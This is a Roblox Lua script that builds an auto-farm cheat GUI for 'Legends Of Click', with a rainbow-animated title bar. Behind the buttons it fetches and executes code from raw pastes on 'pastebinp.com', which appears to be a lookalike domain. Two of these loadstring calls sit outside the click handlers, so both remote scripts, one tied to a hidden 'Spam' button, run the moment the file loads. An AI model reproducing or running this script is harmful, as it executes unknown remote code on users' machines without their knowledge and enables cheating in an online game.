-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local MainUI = Instance.new("Frame")
local RGB = Instance.new("Frame")
local MainLabel = Instance.new("TextLabel")
local MainLabel2 = Instance.new("TextLabel")
local AutoFarmButton = Instance.new("TextButton")
local Spam = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

MainUI.Name = "MainUI"
MainUI.Parent = ScreenGui
MainUI.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
MainUI.Position = UDim2.new(0.0169660673, 0, 0.535856605, 0)
MainUI.Size = UDim2.new(0, 346, 0, 210)

RGB.Name = "RGB"
RGB.Parent = MainUI
RGB.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
RGB.Size = UDim2.new(0, 346, 0, 12)

MainLabel.Name = "MainLabel"
MainLabel.Parent = MainUI
MainLabel.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
MainLabel.BackgroundTransparency = 1.000
MainLabel.Position = UDim2.new(0, 0, 0.0571428575, 0)
MainLabel.Size = UDim2.new(0, 346, 0, 30)
MainLabel.Font = Enum.Font.SourceSansBold
MainLabel.Text = "Legends Of Click Auto Farm"
MainLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
MainLabel.TextSize = 24.000

MainLabel2.Name = "MainLabel2"
MainLabel2.Parent = MainUI
MainLabel2.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
MainLabel2.BackgroundTransparency = 1.000
MainLabel2.Position = UDim2.new(0.586705208, 0, 0.857142806, 0)
MainLabel2.Size = UDim2.new(0, 143, 0, 30)
MainLabel2.Font = Enum.Font.SourceSansBold
MainLabel2.Text = "By: Federal"
MainLabel2.TextColor3 = Color3.fromRGB(255, 255, 255)
MainLabel2.TextSize = 24.000

AutoFarmButton.Name = "AutoFarmButton"
AutoFarmButton.Parent = MainUI
AutoFarmButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
AutoFarmButton.Position = UDim2.new(0.187861279, 0, 0.380952388, 0)
AutoFarmButton.Size = UDim2.new(0, 200, 0, 48)
AutoFarmButton.Font = Enum.Font.SourceSansBold
AutoFarmButton.Text = "AutoFarm (Click Q)"
AutoFarmButton.TextColor3 = Color3.fromRGB(0, 0, 0)
AutoFarmButton.TextSize = 24.000
AutoFarmButton.TextWrapped = true
AutoFarmButton.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://pastebinp.com/raw/eZRseA8m", true))()
end)
-----------------------------------------------------------
loadstring(game:HttpGet("https://pastebinp.com/raw/eZRseA8m", true))()

Spam.Name = "Spam"
Spam.Parent = MainUI
Spam.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Spam.Position = UDim2.new(0.719653189, 0, 0.114285707, 0)
Spam.Size = UDim2.new(0, 200, 0, 50)
Spam.Visible = false
Spam.Font = Enum.Font.SourceSans
Spam.TextColor3 = Color3.fromRGB(0, 0, 0)
Spam.TextSize = 14.000
Spam.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://pastebinp.com/raw/JSMeqXN2", true))()
end)
-----------------------------------------------------------
loadstring(game:HttpGet("https://pastebinp.com/raw/JSMeqXN2", true))()

-- Scripts:

local function VNKOH_fake_script() -- RGB.LocalScript 
	local script = Instance.new('LocalScript', RGB)

	while true do
		script.Parent.BackgroundColor3 = Color3.new(1,0,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.2,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.3,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.4,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.5,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.6,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.7,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.8,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0.9,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.9,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.8,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.7,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.6,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.5,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.4,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.3,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.2,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.1,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.2)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.3)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.4)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.5)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.6)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.7)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.8)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,0.9)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,1,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.9,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.8,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.7,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.6,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.5,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.4,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.3,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.2,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0.1,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.1,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.2,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.3,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.4,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.5,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.6,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.7,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.8,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(0.9,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,1)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.9)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.8)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.7)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.6)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.5)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.4)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.3)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.2)
		wait(0.01)
		script.Parent.BackgroundColor3 = Color3.new(1,0,0.1)
		wait(0.01)
	end
	
end
coroutine.wrap(VNKOH_fake_script)()
